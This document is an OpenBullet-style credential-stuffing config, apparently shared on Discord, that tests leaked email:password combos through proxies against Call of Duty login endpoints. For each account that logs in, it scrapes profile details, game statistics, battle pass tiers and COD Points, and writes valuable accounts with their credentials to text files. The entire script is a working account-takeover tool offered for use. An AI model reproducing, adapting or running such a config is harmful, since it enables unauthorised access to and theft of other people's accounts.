[SETTINGS]
{
  "Name": "HDTragic",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2021-01-05T12:47:18.0551503-07:00",
  "AdditionalInfo": "",
  "Author": "HDTragic#7650 on Discord",
  "Version": "1.4.1 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION RandomGUID -> VAR "0" 

#Log REQUEST POST "https://profile.callofduty.com/cod/mapp/registerDevice" 
  CONTENT "{\"deviceId\":\"<0>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "Content-Type: application/json" 

#Code PARSE "<SOURCE>" JSON "authHeader" -> VAR "1" 

#Log REQUEST POST "https://profile.callofduty.com/cod/mapp/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json" 
  HEADER "Content-Type: application/json" 
  HEADER "Authorization: bearer <1>" 
  HEADER "x_cod_device_id: <0>" 

#Login KEYCHECK 
  KEYCHAIN Success OR 
    KEY "success\":true" 
  KEYCHAIN Failure OR 
    KEY "success\":false" 
    KEY "errorMessage\":\"JSON parse " 

PARSE "<SOURCE>" JSON "ACT_SSO_COOKIE" -> VAR "4" 

#Info REQUEST GET "https://profile.callofduty.com/cod-mobile/userInfo/<4>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: en-us" 
  HEADER "atvi-auth: Bearer <4>" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

#1 PARSE "<SOURCE>" LR "emailValidated\":" ",\"" CreateEmpty=FALSE -> CAP "EmailValidated" 

#2 PARSE "<SOURCE>" LR "gamerAccountLinked\":" ",\"" CreateEmpty=FALSE -> CAP "GamerAccountLinked" 

#Country PARSE "<SOURCE>" LR "countryCode\":\"" "\",\"" CreateEmpty=FALSE -> CAP "Country" 

#Profile REQUEST GET "https://www.callofduty.com/api/papi-client/crm/cod/v2/identities/<4>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: en-us" 
  HEADER "atvi-auth: Bearer <4>" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

#Games PARSE "<SOURCE>" JSON "title" Recursive=TRUE CreateEmpty=FALSE -> CAP "Games" 

#Platform PARSE "<SOURCE>" JSON "platform" Recursive=TRUE CreateEmpty=FALSE -> CAP "Platform" 

#Platform PARSE "<SOURCE>" JSON "platform" -> VAR "2" 

#User PARSE "<SOURCE>" JSON "username" -> VAR "3" 

#Free KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "{\"status\":\"success\",\"data\":{\"titleIdentities\":[]}}" 

#encode_user FUNCTION URLEncode "<3>" -> VAR "3" 

#Stats REQUEST GET "https://www.callofduty.com/api/papi-client/stats/cod/v1/title/mw/platform/<2>/gamer/<3>/profile/type/mp?locale=en" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "atvi-auth: Bearer <4>" 

#all PARSE "<SOURCE>" JSON "all" -> VAR "all" 

#Level PARSE "<SOURCE>" JSON "level" CreateEmpty=FALSE -> CAP "MWLevel" 

#KD PARSE "<SOURCE>" JSON "kdRatio" CreateEmpty=FALSE -> CAP "MWK/D" 

#Kills PARSE "<all>" JSON "kills" CreateEmpty=FALSE -> CAP "MWKills" 

#User PARSE "<SOURCE>" JSON "username" CreateEmpty=FALSE -> CAP "MWUser" 

#BR PARSE "<SOURCE>" JSON "br" -> VAR "BR" 

#Wins PARSE "<BR>" JSON "wins" -> CAP "WZ_Wins" 

#WZK/D PARSE "<BR>" JSON "kdRatio" -> CAP "WZ_K/D" 

#Stats REQUEST GET "https://www.callofduty.com/api/papi-client/stats/cod/v1/title/cw/platform/<2>/gamer/<3>/profile/type/mp?locale=en" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "atvi-auth: Bearer <4>" 

#CWStats PARSE "<SOURCE>" JSON "all" CreateEmpty=FALSE -> VAR "CWStats" 

#Prestige PARSE "<SOURCE>" JSON "prestige" CreateEmpty=FALSE -> CAP "CWPrestige" 

#Level PARSE "<SOURCE>" JSON "level" CreateEmpty=FALSE -> CAP "CWLevel" 

#KD PARSE "<SOURCE>" JSON "kdratio" CreateEmpty=FALSE -> CAP "CWK/D" 

#Kills PARSE "<SOURCE>" JSON "kills" CreateEmpty=FALSE -> CAP "CWKills" 

#BattlePass REQUEST GET "https://www.callofduty.com/api/papi-client/loot/title/cw/platform/<2>/gamer/<3>/status/en" 
  

  HEADER "atvi-auth: Bearer <4>" 
  HEADER "Accept: application/json, text/plain, */*" 

#Season2 PARSE "<SOURCE>" JSON "loot_season_1" -> VAR "loot_season_1" 

#Current_Tier PARSE "<loot_season_1>" JSON "tier" -> CAP "Current_Tier" 

#Season1 PARSE "<SOURCE>" JSON "loot_season_0" -> VAR "loot_season_0" 

#Last_Season_Tier PARSE "<loot_season_0>" JSON "tier" -> CAP "Last_Season_Tier" 

REQUEST GET "https://my.callofduty.com/api/papi-client/inventory/v1/title/cw/platform/<2>/gamer/<3>/currency" 
  
  HEADER "atvi-auth: Bearer <4>" 
  HEADER "Accept: application/json, text/plain, */*" 

#COD_Points PARSE "<SOURCE>" JSON "codPoints" CreateEmpty=FALSE -> CAP "Points" 

IF "<WZ_Wins>" GreaterThan "150"

UTILITY File "WZ_Wins_100+.txt" AppendLines "----[Account]----\\nCombo : <USER>:<PASS>\\nUser : <MWUser>\\nCod Points : <Points>\\n---------[INFORMATION]-------\\nGames : <Games>\\nPlatform : <Platform>\\nEmail Validated : <EmailValidated>\\n-------[Modern Warfare]------\\nLevel : <MWLevel>\\nKills : <MWKills>\\nK/D : <MWK/D>\\nWZ Wins : <WZ_Wins>\\nWZ K/D : <WZ_K/D>\\n---------[Cold War]--------\\nPrestige : <CWPrestige>\\nLevel : <CWLevel>\\nKills : <CWKills>\\nK/D : <CWK/D>\\nSeason 1 Tier : <Last_Season_Tier>\\nSeason 2 Tier : <Current_Tier>\\n********Config By: HD Tragic#7650**********" 

ENDIF
IF "<MWKills>" GreaterThan "50000"

UTILITY File "MW_Kills_40K+.txt" AppendLines "----[Account]----\\nCombo : <USER>:<PASS>\\nUser : <MWUser>\\nCod Points : <Points>\\n---------[INFORMATION]-------\\nGames : <Games>\\nPlatform : <Platform>\\nEmail Validated : <EmailValidated>\\n-------[Modern Warfare]------\\nLevel : <MWLevel>\\nKills : <MWKills>\\nK/D : <MWK/D>\\nWZ Wins : <WZ_Wins>\\nWZ K/D : <WZ_K/D>\\n---------[Cold War]--------\\nPrestige : <CWPrestige>\\nLevel : <CWLevel>\\nKills : <CWKills>\\nK/D : <CWK/D>\\nSeason 1 Tier : <Last_Season_Tier>\\nSeason 2 Tier : <Current_Tier>\\n********Config By: HD Tragic#7650**********" 

ENDIF
IF "<CWPrestige>" GreaterThan "7"

UTILITY File "CW_Prestige_5+.txt" AppendLines "----[Account]----\\nCombo : <USER>:<PASS>\\nUser : <MWUser>\\nCod Points : <Points>\\n---------[INFORMATION]-------\\nGames : <Games>\\nPlatform : <Platform>\\nEmail Validated : <EmailValidated>\\n-------[Modern Warfare]------\\nLevel : <MWLevel>\\nKills : <MWKills>\\nK/D : <MWK/D>\\nWZ Wins : <WZ_Wins>\\nWZ K/D : <WZ_K/D>\\n---------[Cold War]--------\\nPrestige : <CWPrestige>\\nLevel : <CWLevel>\\nKills : <CWKills>\\nK/D : <CWK/D>\\nSeason 1 Tier : <Last_Season_Tier>\\nSeason 2 Tier : <Current_Tier>\\n********Config By: HD Tragic#7650**********" 

ENDIF

